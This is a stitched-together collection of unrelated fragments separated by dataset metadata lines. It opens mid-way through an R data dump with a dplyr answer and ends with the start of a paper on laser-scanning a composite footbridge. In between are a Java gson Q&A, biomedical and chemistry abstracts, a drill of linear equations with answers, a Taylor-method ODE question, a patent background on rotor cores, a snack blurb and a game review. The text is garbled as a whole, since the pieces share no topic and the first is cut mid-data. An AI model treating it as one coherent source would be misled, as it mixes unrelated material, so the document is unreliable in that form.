13300, NA, 12595, 11390, NA, 13800, NA, 4500, 8500, 12250, NA, 8730, NA, NA, 10355, NA, 12120, 8830, 8408, 6200, 10300, 9480, 12400, 8114, 15610, 16320, 6764, NA, NA, NA, 18180, NA), in_state_tuition = c(2380, 34850, 4128, 17661, 27810, 9440, 38660, 5375, 37087, 13680, 15150, 41160, 5160, 2281, 9698, 4440, 11068, 2310, 9300, 20830, 35105, 6726, 3246, 32060, 45775, 45306, 7144, 27910, 5416, 33484, 1418, 4140, 47540, 6400, 19970, 3150, 13340, 18000, 40258, 4530, 34885, 28302, 1998, 2670, 12840, 17160, 34100, 35160, 35160, 10950, 958, 35680, 31826, 18735, 18735, 18735, 18735, 18735, 18735, 8150, 1416, 3700, 48459, 6946, 56426, 6900, 17330, 28000, 30450, 17388, 29288, 2625, 8489, 37860, 4110, 5584, 5073, 1420, 35718, 20670, 16210, 22575, 27435, 6200, 14720, 7214, 32574, 23600, 4811, 43580, 26796, 10822, 2520, 8760, 2450, 8608, 3274, 3600, 3570, 3480, 9068, 13190, 6384, 33889, 43416, 24024, 14850, 21645, 23376, 14065, 30198, 2354, 12160, 5310, 21342, 1399, 4404, 40958, 5888, 6810, 3292, 4008, 3350, 5096, 4525, 11276, 10288, 38800, 3494, 10758, 42135, 33018, 18510, 24260, 39985, 2550, 11900, 8411, 20850, 34400, 19900, 38880, 51104, 29830, 1418, 32586, 9896, 2893, 14150, 12300, 14700, 6690, 7800, 19690, 54680, 55732, 55032, 29850, 1391, 30880, 3440, 26166, 53794, 4783, 3981, 4830, 3250, 34225, 27750, 5775, 45727, 39016, 2344, 39200, 4000, 9500, 25300, 42200, 4258, 9390, 22178, 2790, 18500, 4973, 34310, 50040, 8696, 16600, 29530, 34290, 18690, 18513, 54360, 49880, 39990, 5610, 9450, 1432, 42750, 8569), in_state_total = c(2380, 45200, 12602, 17661, 44458, 18222, 54690, 17035, 48405, 13680, 19350, 53490, 5160, 2281, 18077, 4440, 16490, 2310, 15000, 28130, 46025, 15604, 3246, 45260, 58155, 57376, 16752, 36770, 5416, 
46000, 1418, 4140, 59680, 10400, 27252, 8220, 20570, 18000, 51256, 4530, 34885, 36848, 1998, 2670, 12840, 17160, 34100, 53115, 48415, 19590, 7208, 49980, 49188, 18735, 18735, 18735, 18735, 18735, 18735, 8150, 1416, 3700, 63339, 6946, 71166, 6900, 26930, 37830, 40340, 28024, 38366, 8125, 17619, 52490, 4110, 5584, 5073, 1420, 43358, 20670, 16210, 22575, 27435, 6200, 22680, 15518, 41906, 23600, 4811, 57380, 37470, 23470, 9220, 17586, 2450, 16768, 3274, 8880, 3570, 3480, 16938, 19690, 17769, 40589, 43416, 33624, 14850, 32573, 26134, 23565, 37358, 2354, 12160, 5310, 31283, 1399, 4404, 53652, 5888, 6810, 3292, 4008, 3350, 5096, 4525, 24608, 17268, 49080, 3494, 20398, 52707, 41266, 18510, 35960, 52512, 2550, 11900, 19111, 32286, 44376, 27100, 48956, 67416, 38240, 1418, 42140, 20130, 2893, 21650, 16912, 17600, 9840, 10300, 28990, 70168, 70648, 72257, 40950, 1391, 41000, 9234, 33756, 69018, 4783, 3981, 8030, 3250, 47024, 41050, 5775, 58322, 50406, 2344, 53000, 4000, 14000, 33800, 54450, 4258, 18120, 22178, 2790, 28855, 4973, 46430, 58870, 17104, 22800, 39830, 43770, 31090, 26627, 69970, 66200, 46754, 5610, 9450, 1432, 60930, 8569 ), out_of_state_tuition = c(2380, 34850, 12550, 17661, 27810, 20456, 38660, 9935, 37087, 13680, 15150, 41160, 8010, 13018, 17918, 8880, 19396, 8070, 9300, 20830, 35105, 19802, 5916, 32060, 45775, 45306, 7144, 27910, 5416, 33484, 7898, 9210, 47540, 6400, 19970, 3150, 13340, 18000, 40258, 6840, 34885, 28302, 4818, 5880, 12840, 17160, 34100, 35160, 35160, 10950, 958, 35680, 31826, 18735, 18735, 18735, 18735, 18735, 18735, 8150, 9546, 3700, 48459, 6946, 56426, 6900, 17330, 28000, 30450, 17388, 29288, 5535, 20939, 37860, 12180, 5584, 5073, 9760, 35718, 20670, 16210, 22575, 27435, 6200, 14720, 22021, 32574, 23600, 18671, 43580, 26796, 28336, 9510, 8760, 4250, 15298, 5014, 5760, 5580, 5310, 15848, 13190, 19866, 33889, 43416, 24024, 14850, 21645, 23376, 14065, 30198, 8114, 12160, 18000, 21342, 1399, 13170, 40958, 5888, 12870, 5962, 12088, 6020, 8096, 4525, 30524, 22048, 38800, 6164, 29796, 42135, 33018, 18510, 24260, 39985, 13020, 11900, 24467, 20850, 34400, 19900, 38880, 51104, 29830, 7838, 32586, 26468, 6973, 14150, 12300, 14700, 6690, 7800, 19690, 54680, 55732, 55032, 29850, 9131, 30880, 3440, 26166, 53794, 10214, 8059, 8910, 3250, 34225, 27750, 5775, 45727, 39016, 8104, 39200, 4000, 9500, 25300, 42200, 9689, 9390, 22178, 3460, 18500, 8070, 34310, 50040, 8696, 16600, 29530, 34290, 18690, 18513, 54360, 49880, 39990, 10650, 9450, 9622, 42750, 15589), out_of_state_total = c(2380, 45200, 21024, 17661, 44458, 29238, 54690, 21595, 48405, 13680, 19350, 53490, 8010, 13018, 26297, 8880, 24818, 8070, 15000, 28130, 46025, 28680, 5916, 45260, 58155, 57376, 16752, 36770, 5416, 46000, 7898, 9210, 59680, 10400, 27252, 8220, 20570, 18000, 51256, 6840, 34885, 36848, 4818, 5880, 12840, 17160, 34100, 53115, 48415, 19590, 7208, 49980, 49188, 18735, 18735, 18735, 18735, 18735, 18735, 8150, 9546, 3700, 63339, 6946, 71166, 6900, 26930, 37830, 40340, 28024, 38366, 11035, 30069, 52490, 12180, 5584, 5073, 9760, 43358, 20670, 16210, 22575, 27435, 6200, 22680, 30325, 41906, 23600, 18671, 57380, 37470, 40984, 16210, 17586, 4250, 23458, 5014, 11040, 5580, 5310, 23718, 19690, 31251, 40589, 43416, 33624, 14850, 32573, 26134, 23565, 37358, 8114, 12160, 18000, 31283, 1399, 13170, 53652, 5888, 12870, 5962, 12088, 6020, 8096, 4525, 43856, 29028, 49080, 6164, 39436, 52707, 41266, 18510, 35960, 52512, 13020, 11900, 35167, 32286, 44376, 27100, 48956, 67416, 38240, 7838, 42140, 36702, 6973, 21650, 16912, 17600, 9840, 
10300, 28990, 70168, 70648, 72257, 40950, 9131, 41000, 9234, 33756, 69018, 10214, 8059, 12110, 3250, 47024, 41050, 5775, 58322, 50406, 8104, 53000, 4000, 14000, 33800, 54450, 9689, 18120, 22178, 3460, 28855, 8070, 46430, 58870, 17104, 22800, 39830, 43770, 31090, 26627, 69970, 66200, 46754, 10650, 9450, 9622, 60930, 15589)), row.names = c(NA, -200L), class = c("tbl_df", "tbl", "data.frame")) A: You can use diff/lag to calculate difference : library(dplyr) tuition_cost_clean %>% filter(degree_length == "4 Year") %>% arrange(state, desc(in_state_total)) %>% group_by(state_code) %>% slice(which.max(in_state_total), which.min(in_state_total)) %>% mutate(pct_change = -diff(in_state_total)/max(in_state_total) * 100) %>% select(name, state_code, in_state_total, pct_change) # name state_code in_state_total pct_change # <chr> <chr> <dbl> <dbl> # 1 Alaska Pacific University AK 28130 46.7 # 2 Alaska Bible College AK 15000 46.7 # 3 Auburn University AL 24608 72.3 # 4 Athens State University AL 6810 72.3 # 5 Arkansas Baptist College AR 17586 4.65 # 6 Arkansas State University AR 16768 4.65 # 7 Arizona Christian University AZ 37470 80.8 # 8 American Indian College of the Assemblies of God AZ 7208 80.8 # 9 American Jewish University CA 49188 80.8 #10 Bergin University of Canine Studies CA 9450 80.8 # … with 62 more rows
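Outside of R, the same grouped max/min percent difference can be sketched with pandas. This is an addition for comparison only (not part of the accepted answer), using a tiny stand-in for tuition_cost_clean with the same column names:

import pandas as pd

# small stand-in frame; in practice this would be the full tuition_cost_clean data
df = pd.DataFrame({
    "name": ["Alaska Pacific University", "Alaska Bible College",
             "Spring Hill College", "Huntsville Bible College"],
    "state_code": ["AK", "AK", "AL", "AL"],
    "degree_length": ["4 Year"] * 4,
    "in_state_total": [28130, 15000, 52926, 5390],
})

four_year = df[df["degree_length"] == "4 Year"]
per_state = four_year.groupby("state_code")["in_state_total"]

# keep only each state's max and min rows, mirroring the slice() step
extremes = four_year.loc[per_state.idxmax().tolist() + per_state.idxmin().tolist()]
extremes = extremes.sort_values(["state_code", "in_state_total"], ascending=[True, False])

# percent difference between max and min, repeated on both rows of each state
g = extremes.groupby("state_code")["in_state_total"]
extremes["pct_change"] = (g.transform("max") - g.transform("min")) / g.transform("max") * 100
print(extremes[["name", "state_code", "in_state_total", "pct_change"]])

# AK comes out at about 46.68 and AL at about 89.82, matching the desired output above.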
null
minipile
NaturalLanguage
mit
null
Q: How to iterate over json data with gson My json string is: { "recordsTotal":1331, "data":[ { "part_number":"3DFN64G08VS8695 MS", "part_type":"NAND Flash", "id":1154, "manufacturers":[ "3D-Plus" ] }, { "part_number":"3DPM0168-2", "part_type":"System in a Package (SiP)", "id":452, "manufacturers":[ "3D-Plus" ] }, { "part_number":"3DSD1G16VS2620 SS", "part_type":"SDRAM", "id":269, "manufacturers":[ "3D-Plus" ] } ] } This code lets me access the two highest level elements: JsonObject jsonObject = new JsonParser().parse(jsonString).getAsJsonObject(); System.out.println("data : " + jsonObject.get("data")); System.out.println("recordsTotal : " + jsonObject.get("recordsTotal")); But what I want to do is iterate over all the objects inside "data" and create a list of part_numbers. How do I do that? A: JsonArray is an Iterable<JsonElement>. So you can use for in loop. JsonObject jsonObject = new JsonParser().parse(jsonString).getAsJsonObject(); final JsonArray data = jsonObject.getAsJsonArray("data"); System.out.println("data : " + data); System.out.println("recordsTotal : " + jsonObject.get("recordsTotal")); List<String> list = new ArrayList<String>(); for (JsonElement element : data) { list.add(((JsonObject) element).get("part_number").getAsString()); }
null
minipile
NaturalLanguage
mit
null
Keratinocyte growth factor (FGF-7) stimulates migration and plasminogen activator activity of normal human keratinocytes. Keratinocyte growth factor (KGF), a member of the fibroblast growth factor (FGF) family (and alternatively designated FGF-7), is a paracrine growth factor produced by mesenchymal cells and mitogenic specifically for epithelial cells. The potential effect of KGF on wound healing was assessed in vitro by measuring randomized migration and plasminogen activator (PA) activity of keratinocytes in response to the growth factor. Incubation of normal human keratinocytes with KGF in modified MCDB 153 medium significantly stimulated cell migration and PA activity compared with control (p < 0.001 and p < 0.01, respectively). When tested in these assays on an equimolar basis, 1 nM KGF was at least as potent as transforming growth factor alpha and more active than basic FGF. None of these effects were observed when KGF was administered to fibroblasts or endothelial cells. Stimulation of keratinocyte migration by KGF was dose dependent, and a neutralizing monoclonal antibody against KGF reduced KGF-stimulated migration and cell growth. Zymographic analyses of cell extracts and conditioned medium from KGF-treated keratinocytes revealed increased PA activity, which was mainly attributable to an elevated level of urokinase-type PA. These in vitro results suggest that KGF may have an important role in stimulating reepithelialization during the process of wound repair.
null
minipile
NaturalLanguage
mit
null
w. -4 Solve -432*d + 228*d + 304 = -223*d for d. -16 Solve -164 = -16*j - 56 + 308 for j. 26 Solve -24*x - 210*x = -2574 for x. 11 Solve -110*h + 2638 - 3738 = 0 for h. -10 Solve 0 = 80*i - 123 - 117 for i. 3 Solve 1223*j + 5165 = 158*j - 24655 for j. -28 Solve -138 + 550 = -87*q - 23 for q. -5 Solve -158*p + 464*p = -201*p + 507 for p. 1 Solve 80*f - 683 - 437 = 0 for f. 14 Solve -246*h = -402*h + 3900 for h. 25 Solve 62*w + 32*w + 56 = -132 for w. -2 Solve 0 = 183*v + 32*v - 2*v + 118*v for v. 0 Solve -5372 = 35*x - 5862 for x. 14 Solve -279 = -104*m + 449 for m. 7 Solve 11*z - 607 - 523 = -778 for z. 32 Solve 0 = -292*c + 240*c - 780 for c. -15 Solve 5*w - 34 = -47 - 52 for w. -13 Solve -1910 = 7*g - 1805 for g. -15 Solve 1481*y = 1403 + 23774 for y. 17 Solve -19*o - 18*o = 15*o - 35*o for o. 0 Solve 255*i = -266*i + 549*i + 224 for i. -8 Solve -2459*i = -2460*i - 27 for i. -27 Solve 223*u + 840 = 163*u for u. -14 Solve 21168 = 339*b - 97*b + 542*b for b. 27 Solve 503 = 521*x + 9060 + 3947 for x. -24 Solve 28 - 6 = 26*g - 4 for g. 1 Solve -81718*t - 200 = -81726*t for t. 25 Solve 25*t + 98 - 18 = -15*t for t. -2 Solve 1041 - 202 = 32*h + 327 for h. 16 Solve -99*n - 249*n = -107*n + 131*n for n. 0 Solve 0 = 212*d - 192*d - 380 for d. 19 Solve -911*a + 1594 = 20725 for a. -21 Solve -2488*n - 255 = -2473*n for n. -17 Solve -9837*k + 312 = -4928*k - 4933*k for k. -13 Solve -14230 + 13195 = -45*u for u. 23 Solve 66*v - 36 = 60*v for v. 6 Solve 4387*p = 4330*p for p. 0 Solve -w - 16*w + 88 = -9*w for w. 11 Solve 0 = -3230*a + 3259*a + 174 for a. -6 Solve -216*k + 239 = -179*k - 316 for k. 15 Solve -76*y - 530 = -1594 for y. 14 Solve 75*g + 9635 = 8135 for g. -20 Solve -74 + 32 = -14*z for z. 3 Solve -561*c + 262*c + 120 = -284*c for c. 8 Solve -215 = -4607*j + 4596*j + 5 for j. 20 Solve 27*k + 510 = -49*k + 42*k for k. -15 Solve 17*g = -1127 + 1161 for g. 2 Solve 0 = 35*y - 282 - 138 for y. 12 Solve 5362 - 5719 = -21*q for q. 17 Solve -6 + 16 = 10*y for y. 1 Solve -9*i = -75 + 30 for i. 5 Solve -63*s - 78*s = -100*s + 451 for s. -11 Solve 0 = -62*r - 37 - 273 for r. -5 Solve -2*p + 0*p - 48 = -10*p for p. 6 Solve 7*y + 116 = -109*y for y. -1 Solve 252 = -181*k + 97*k for k. -3 Solve 27*h + 33*h - 60 = 0 for h. 1 Solve -3 + 4 - 105 = 26*z for z. -4 Solve 144 = -17*f - 152 - 95 for f. -23 Solve -69*a + 45043 = 42352 for a. 39 Solve -26*l + l - 13 = 37 for l. -2 Solve -r - 33 = 7*r - 65 for r. 4 Solve 274*m - 822 - 1370 = 0 for m. 8 Solve -37*c = 1611 - 3321 + 1340 for c. 10 Solve 174*t = 229*t - 203*t + 888 for t. 6 Solve -117*i - 2867 = -1346 for i. -13 Solve 2924*p - 2788*p + 1768 = 0 for p. -13 Solve 114*w + 490 = -244 - 748 for w. -13 Solve 42*v + 48921 = 49635 for v. 17 Solve 139*r - 121*r + 41 = -85 for r. -7 Solve -616 + 520 = -24*k for k. 4 Solve 2*u + 14*u + 106 = -86 for u. -12 Solve 18*k + 43 + 314 = 87 for k. -15 Solve -12069 = -459*w + 12*w for w. 27 Solve 409*w + 109*w - 1580 = 3600 for w. 10 Solve -6*b - 6*b - 40 = -10*b for b. -20 Solve 0 = -309*w + 10*w + 570 - 2065 for w. -5 Solve -45 = -19*y + 39 - 8 for y. 4 Solve 11 + 61 = u + 11*u for u. 6 Solve 9713 - 9881 = 12*j for j. -14 Solve 102*z + 19*z = -163*z - 48*z for z. 0 Solve 47*b - 824 - 967 = -152*b for b. 9 Solve 254*f + 2486 + 1819 = 49*f for f. -21 Solve 32925 = -28*n + 32449 for n. -17 Solve 3693 = -422*z - 4325 for z. -19 Solve 17*d + 17*d + 8*d = -11*d for d. 0 Solve 584 = 3*g - 91*g + 2784 for g. 25 Solve 0 = 19*d - 49 + 68 for d. -1 Solve 48*y - 12*y = -684 for y. -19 Solve 18500*v + 198 = 18482*v for v. 
-11 Solve 4*r - 7 = 7 - 42 for r. -7 Solve -89*j - 7*j = 55*j + 2718 for j. -18 Solve -408 = 111*v + 1479 for v. -17 Solve -1402 - 272 = -279*g for g. 6 Solve -127*p + 3536 = 145*p for p. 13 Solve 0 = f + 7*f - 2*f + 36 for f. -6 Solve 7*x - 2870 + 2947 = 0 for x. -11 Solve -990 + 587 = 31*b for b. -13 Solve 244*w + 2811 = -117 for w. -12 Solve 47*r = 57 + 436 - 1574 for r. -23 Solve 104*z + 369 = -45*z + 1561 for z. 8 Solve -2*n + 4*n - 22*n = -340 for n. 17 Solve -187*m + 1047*m = 3440 for m. 4 Solve -39*h + 201 = -33 for h. 6 Solve -884*j + 922*j = 988 for j. 26 Solve -2442 = 41*m - 2319 for m. -3 Solve -40*s + 19153 = 19593 for s. -11 Solve -6326*f + 5990*f - 9744 = 0 for f. -29 Solve 0 = -17133*a + 17271*a + 1242 for a. -9 Solve 143*q - 1641 = -629 + 1562 for q. 18 Solve 0 = -136*o + 8*o + 6*o - 244 for o. -2 Solve 8439*h + 11 = 8444*h - 104 for h. 23 Solve -177*p - 1917 = 179*p - 10105 for p. 23 Solve 212*j + 35318 = 29806 for j. -26 Solve -12*s + 2754 = 2550 for s. 17 Solve -41*x - 2234 = -2767 for x. 13 Solve 17*p = -121*p - 1104 for p. -8 Solve 29*v + 96 = -20 for v. -4 Solve 185*y + 149*y - 1602 = 245*y for y. 18 Solve -90 - 250 = -331*s + 7604 for s. 24 Solve 528*k + 263 + 2090 = -1871 for k. -8 Solve -488*v - 576 = -88 for v. -1 Solve 700 = 602*x - 582*x for x. 35 Solve -3525*w + 3527*w - 38 = 0 for w. 19 Solve 56*t - 453 + 61 = 0 for t. 7 Solve 59*u = 3*u + u + 605 for u. 11 Solve -383*h + 753*h - 379*h + 36 = 0 for h. 4 Solve -26*n - 6*n + 585 = 7*n for n. 15 Solve 0 = 96*m - 11*m - 680 for m. 8 Solve 42*s - 36 = -18*s + 78*s for s. -2 Solve -31 = 115*g + 11 + 73 for g. -1 Solve 614 + 372 = -37*m - 21*m for m. -17 Solve 0 = 57*y - 0*y - 6*y + 918 for y. -18 Solve -157*p = 14 - 14 for p. 0 Solve -345*k + 1311 = -96*k - 930 for k. 9 Solve 0 = 2698*m - 2704*m + 90 for m. 15 Solve 3300 = -168*n + 253*n + 245*n for n. 10 Solve -386*o + 1333 = -343*o for o. 31 Solve -187*o - 199*o = 2316 for o. -6 Solve 0 = -1172*d + 27058 + 15134 for d. 36 Solve 13252*t - 13268*t = -4 - 28 for t. 2 Solve 0 = -2942*a + 3015*a + 803 for a. -11 Solve 32*u - 2508 = 134*u + 12*u for u. -22 Solve -622 + 1894 = 106*j for j. 12 Solve -33*a = -23*a - 90 for a. 9 Solve -578*q + 20 = -574*q for q. 5 Solve -817 - 3334 = -185*g - 821 for g. 18 Solve -236*i + 428*i - 1086 = 258 for i. 7 Solve -140*r - 88*r = -12*r - 3456 for r. 16 Solve 171*d = 53*d + 826 for d. 7 Solve -76*d + 144*d = 73*d for d. 0 Solve 1876*w + 196 = 1848*w for w. -7 Solve 0 = -1494*g + 755*g + 796*g + 1368 for g. -24 Solve 49*r + 232 = -307 for r. -11 Solve -2329 = -290*z + 6261 + 1270 for z. 34 Solve 193*a + 285 = 136*a for a. -5 Solve 29*s + 5*s + 13*s + 564 = 0 for s. -12 Solve -156330*f = -156383*f + 212 for f. 4 Solve 3529 + 2055 - 2056 = 126*o for o. 28 Solve 0 = 13*j + 5*j + 85 + 5 for j. -5 Solve -2080 = -457*w - 509*w + 1018*w for w. -40 Solve 0 = 20030*z - 20015*z - 330 for z. 22 Solve 208*p + 238 + 122 = 3064 for p. 13 Solve -749*x + 374 = -766*x for x. -22 Solve 0 = 893*b - 902*b - 99 for b. -11 Solve 0 = 42*s + 936 - 600 for s. -8 Solve -106*h + 45 + 146 = -21 for h. 2 Solve 54*g + 553 = 11*g - 393 for g. -22 Solve 493*x - 572*x + 1817 = 0 for x. 23 Solve 920 = 76*b + 84 for b. 11 Solve -49*j = 207*j - 40*j - 1080 for j. 5 Solve -98 = -162*r - 2204 for r. -13 Solve 29*g + 2528 - 2731 = 0 for g. 7 Solve -5*k + 0*k - 50 = 5*k for k. -5 Solve -196*v = -4059 - 57 for v. 21 Solve -h + 1482 - 1458 = 0 for h. 24 Solve -5*k - 19*k - 4*k - 280 = 0 for k. -10 Solve -1362*j = -55*j + 7842 for j. -6 Solve 25*i = -39 - 61 for i. 
-4 Solve -91 = c - 43 - 49 for c. 1 Solve -246 = -54*g + 176 + 334 for g. 14 Solve -4930 = 51*b - 587*b + 43*b for b. 10 Solve 150 = -211*t + 136*t for t. -2 Solve -63*f + 799 = -208*f + 98*f for f. -17 Solve 60 = -7*h - 7*h - 24 for h. -6 Solve 27*z - 28*z = -59*z + 580 for z. 10 Solve 2238 = -321*r - 4182 for r. -20 Solve 2320*g - 2204*g + 580 = 0 for g. -5 Solve -29*q - 23*q + 389 = 77 for q. 6 Solve 37*w = 346*w - 7416 for w. 24 Solve -39*p - 1 + 5 = -38*p for p. 4 Solve 0 = -113*h - 36*h - 2086 for h. -14 Solve -85 - 19 = -38*n + 124 for n. 6 Solve 54998*z + 88 = 54987*z for z. -8 Solve -163*b - 2806 = -41*b for b. -23 Solve 3*k - 3299 + 1632 = -1607 for k. 20 Solve -71*u - 692 - 289 = 38*u for u. -9 Solve -1113*f + 609 = 1127*f - 2211*f for f. 21 Solve 0 = 67*d + 4*d + 7*d + 2028 for d. -26 Solve 25*x - 535 + 660 = 0 for x. -5 Solve 31*y = -160832 + 160646 for y. -6 Solve -258*l + 265*l + 21 = 0 for l. -3 Solve -2025*g + 960 = -2145*g for g. -8 Solve 990 = 3*y + 1011 for y. -7 Solve 0 = 165*m + 465 - 2115 for m. 10 Solve -3014*j + 8164 = -3642*j for j. -13 Solve 6*s + 175 = 31*s for s
null
minipile
NaturalLanguage
mit
null
[Transurethral resection and cancer of the prostate, an up-to-date view]. Current urological literature, which is mainly concerned with radical prostate surgery and new modalities of hormone therapy, seems to focus little interest on the indications and techniques of transurethral resection in patients with prostatic cancer. However, transurethral surgery still remains a procedure frequently resorted to in those patients in whom the indications and techniques warrant a critical evaluation. The reasons for performing endoscopic surgery (64%) and the complications observed in 50 consecutive cases that had been treated by the author are analyzed herein and the literature reviewed.
null
minipile
NaturalLanguage
mit
null
About this Deal Grab some gourmet grub to go. Bacon Peanut Brittles are a blend of peanuts, maple syrup, bacon, and spices, tossed and roasted into addictively crunchy bites. They satisfy modern gourmet palates and pay homage to memories of a home-cooked classic
null
minipile
NaturalLanguage
mit
null
Q: Initial-Value Problem Taylor's Method of order 2 Given the initial-value problem $$y' = te^{3t} - 2y,\qquad 0 \leq t \leq 1, \qquad y(0) = 0$$ with $h = 0.5$. Use Taylor's method of order two to approximate the solutions to the given IVP. (Solution: $w_1 = 0.12500000$, $w_2 = 2.02323897$.)

I've tried this problem quite a few times but keep getting incorrect answers. My guess is that I'm calculating the derivative incorrectly, which is giving me an incorrect result for $w_2$. My approach so far is as follows: Observe that $f(t, y) = te^{3t} - 2y$. I calculate that $f'(t, y) = e^{3t} + 3t^2e^{3t} - 2y'$, which is the same as $f'(t, y) = e^{3t} + 3t^2e^{3t} - 2(te^{3t} - 2y) = e^{3t}(3t^2 -2t + 1) + 4y$. Also, $t_0 = 0$, $t_1 = 0.5$, and $t_2 = 1$. $w_0 = 0$, $w_1 = w_0 + h(f(t_0, w_0) + \frac{h}{2} f'(t_0, w_0))$ and $w_2 = w_1 + h(f(t_1, w_1) + \frac{h}{2} f'(t_1, w_1))$. Now, plugging in numbers yields: $w_0 = 0$, $w_1 = 0.125$ and $w_2 = 1.603081$. Can someone try and catch what I've done wrong?

PS The reason I think my derivative is wrong is that I wrote a program in MATLAB to calculate the approximations using this method and tested it with an example in the book I'm using, and the results were consistent with the book's, but then when I ran my code, it didn't match the results I should be getting, according to the professor.

A: When you calculate $f'(t,y)$, the derivative of $e^{3t}$ is $3e^{3t}$, not $3te^{3t}$.
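With that correction the total derivative becomes $f'(t, y) = e^{3t} + 3te^{3t} - 2(te^{3t} - 2y) = (1+t)e^{3t} + 4y$, and the two Taylor steps reproduce the quoted solution. Below is a minimal Python sketch of that check (my own illustration, not the MATLAB program mentioned in the question):

import math

def f(t, y):
    # right-hand side of the IVP: y' = t*exp(3t) - 2y
    return t * math.exp(3 * t) - 2 * y

def fprime(t, y):
    # corrected total derivative: df/dt = (1 + t)*exp(3t) + 4y
    return (1 + t) * math.exp(3 * t) + 4 * y

t, w, h = 0.0, 0.0, 0.5
for i in range(2):
    w = w + h * (f(t, w) + (h / 2) * fprime(t, w))
    t = t + h
    print(f"w{i + 1} = {w:.8f}")

# Prints w1 = 0.12500000 and w2 = 2.02323897, matching the stated solution.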
null
minipile
NaturalLanguage
mit
null
JP2006-166498A describes a known manufacturing method of a laminated rotor iron core. According to JP2006-166498A, the manufacturing method of the laminated rotor iron core includes a process for pressing a metal plate and forming belt iron core pieces, and a process for spirally wrapping and laminating the belt iron core pieces and mutually caulking and coupling the laminated belt iron core pieces. The belt iron core pieces have the shape of the laminated rotor iron core linearly developed. The belt iron core pieces have a cutout formed at a side edge corresponding to an inner circumference at a predetermined interval. The circular side edge corresponding to the inner circumference between the adjacent cutouts corresponds to an inner circumference of a shaft hole. The belt iron core pieces have a magnet mounting hole or a diecast metal filling hole formed in the middle in the width direction at the predetermined interval. A side edge corresponding to an outer circumference of the belt iron core pieces is locally pressed and expanded when the belt iron core pieces are spirally wrapped. When the belt iron core pieces are spirally wrapped, because the cutout is formed at the predetermined interval, the side edge corresponding to the inner circumference can be bent without exerting plate compressive force on it, and the belt iron core pieces can be wrapped into a circular shape. However, according to the known manufacturing method of the laminated rotor iron core described in JP2006-166498A, because the belt iron core pieces are locally pressed and expanded when they are spirally wrapped and laminated, partial deformation and embossment tend to form when the outer circumferential side of the belt iron core pieces is bent, and ensuring precision tends to be difficult. Further, for minimizing the deformation of the outer circumferential side of the belt iron core pieces, the belt iron core pieces need a large cutout and a complex shape designed with consideration of the deformation. However, the large cutout and the complex shape of the belt iron core pieces tend to cause a low yield rate of the belt iron core pieces (the material of the laminated rotor iron core) and require a large and expensive punch die set for forming the belt iron core pieces. Further, other than the punch die set, a loading device for loading the belt iron core pieces and a wrapping unit for wrapping and laminating the belt iron core pieces are separately needed for spirally wrapping and laminating the belt iron core pieces. A need thus exists for a method for manufacturing a laminated rotor core which is not susceptible to the drawback mentioned above.
null
minipile
NaturalLanguage
mit
null
A disappointment, to say the least

When I first saw this game I thought "Great, another shmup, I love those". And I do. Games like Sine Mora and Beat Hazard are games I've put a reasonable amount of time into. This one does not meet my expectations. The art style is definitely cool. I like that a lot. Sadly, that's the only thing to it. Repetitive, boring gameplay, and not able to sustain entertainment all the way through. Since the game has a steep learning curve, you will have to refine those reflex skills to progress, and to be honest, I think you can do that somewhere else and be more entertained in the process. Try for example Jamestown instead.
null
minipile
NaturalLanguage
mit
null
Intramolecular Diels-Alder Reaction of a Silyl-Substituted Vinylimidazole en Route to the Fully Substituted Cyclopentane Core of Oroidin Dimers. An intramolecular Diels-Alder reaction of a silyl-substituted vinylimidazole delivers a diastereomeric mixture of C4-silyl functionalized dihydrobenzimidazoles. Subsequent diastereoselective reduction and elaboration of the lactone gives rise to a polysubstituted tetrahydrobenzimidazole, which, upon oxidative rearrangement, affords a single spirofused imidazolone containing all of the relevant functionality for an approach to the oroidin dimers axinellamine, massadine, and palau'amine.
null
minipile
NaturalLanguage
mit
null
1. Introduction {#sec1-sensors-18-04332} =============== In recent years, significant changes in structural diagnostics have been observed, mostly thanks to the development of remote sensing techniques. Moreover, along with the growing influence of computer science, the processing of remote sensing data, such as point cloud data, has become of greater importance. Especially vivid is the progress achieved in laser scanning technology. High-Performance Terrestrial Laser Scanners can gather one million points per second and have a range of more than one kilometer. New challenges demand more sophisticated methods of point cloud processing, designed to evaluate structures and structural deformations. In this paper, we present a general framework for studying the structural deformations of bridges, especially those that deform in an irregular way, such as composite bridges. We describe in detail the advanced shape analysis achieved with the use of a precise optical device, the terrestrial laser scanner (TLS), along with point cloud data processing. The procedure we present combines rough change estimation, virtual visual inspection, and an extensive spheres translation method (STM) analysis, which allows us to obtain a quick change estimation and a detailed picture of the deformation under different types of load. We evaluated a composite pedestrian foot-bridge during proof loading, subjected to various load cases. The load cases of the proof loading were static, so there was no bridge resonance to consider. The study was carried out as a part of broader research project conducted by the Faculty of Civil and Environmental Engineering at the Gdansk University of Technology. The algorithms and procedures described in the following paper are an extension of the methods designed by the authors in previous studies. We compare the state-of-the-art point cloud processing approach with well-known measurement methods, such as a total station measurement, or inductive sensors measurement. A complex form of the span and its unobvious deformation state allow contributions from the advantages of remote sensing techniques. The greatest gain of TLS usage and its competitive advantage over other measurement methods, such as a total station, is the complexity of the obtained data---TLS creates a three-dimensional projection of the scanned object in time. Using a total station, it is possible to measure one particular point at a time, which extends the measurement time and is more time-consuming. The rationale behind performing the analysis on a composite bridge is that composite bridges deform irregularly in three axes, so using TLS in this particular application is valuable. What is more, the presented STM approach has previously only been used in laboratory conditions. The topic of bridge evaluation using TLS appears in the international literature. Riveiro et al. \[[@B1-sensors-18-04332]\] used TLS scans and orthophotographs to evaluate masonry arch bridges. Additionally, Riveiro et al. \[[@B2-sensors-18-04332]\] proposed the use of a hybrid method of TLS, photogrammetry, and total station measurement for the structural inspection of the bridge. Xu et al. \[[@B3-sensors-18-04332]\] and Yang et al. \[[@B4-sensors-18-04332],[@B5-sensors-18-04332]\] present an adoption of TLS technology in the deformation analysis of a composite arch structure under monotonic load. They tested a masonry arch on reinforced concrete supports and used a Z+F laser scanner (Zoller + Fröhlich GmbH, Wangen, Germany). 
